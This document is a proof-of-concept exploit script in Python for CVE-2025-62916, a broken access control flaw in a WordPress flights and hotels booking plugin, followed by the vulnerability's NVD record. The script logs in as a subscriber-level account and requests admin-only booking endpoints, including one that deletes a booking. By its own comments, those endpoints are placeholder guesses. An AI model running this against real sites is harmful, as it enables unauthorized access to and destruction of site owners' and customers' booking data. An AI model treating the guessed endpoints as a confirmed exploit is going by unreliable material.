CVE-2025-62916

# CVE-2025-62916 PoC - WordPress Flights & Hotels Booking Plugin Unauthorized Access # Affected: adiaha-hotel plugin <= 3.1 import requests import sys TARGET_URL = "http://target-wordpress-site.com" # Replace with actual WordPress installation URL def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-62916""" # Low-privilege user credentials (subscriber role) # In real attack scenario, attacker would use compromised low-privilege account username = "attacker_account" password = "password123" # Step 1: Authenticate with WordPress session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": f"{TARGET_URL}/wp-admin/", "testcookie": "1" } print("[*] Attempting to login as low-privilege user...") login_response = session.post(login_url, data=login_data) if "wordpress_logged_in" not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Try to access admin-only functionality (vulnerability check) # Replace endpoint with actual vulnerable endpoint from plugin vulnerable_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php?action=get_all_bookings", f"{TARGET_URL}/wp-json/wp/v2/adiaha-hotel/bookings", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=delete_booking&id=1" ] for endpoint in vulnerable_endpoints: print(f"[*] Testing endpoint: {endpoint}") response = session.get(endpoint) # Check if unauthorized access was successful if response.status_code == 200 and "booking" in response.text.lower(): print(f"[CRITICAL] Vulnerable endpoint found: {endpoint}") print(f"[+] Response preview: {response.text[:200]}") return True print("[-] Target may not be vulnerable or endpoint requires adjustment") return False if __name__ == "__main__": check_vulnerability()

{"cve": {"id": "CVE-2025-62916", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:51.067", "lastModified": "2026-04-28T19:35:02.103", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Travon WP Flights & Hotels Booking WP Plugin adiaha-hotel allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Flights & Hotels Booking WP Plugin: from n/a through <= 3.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/adiaha-hotel/vulnerability/wordpress-flights-hotels-booking-wp-plugin-plugin-3-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}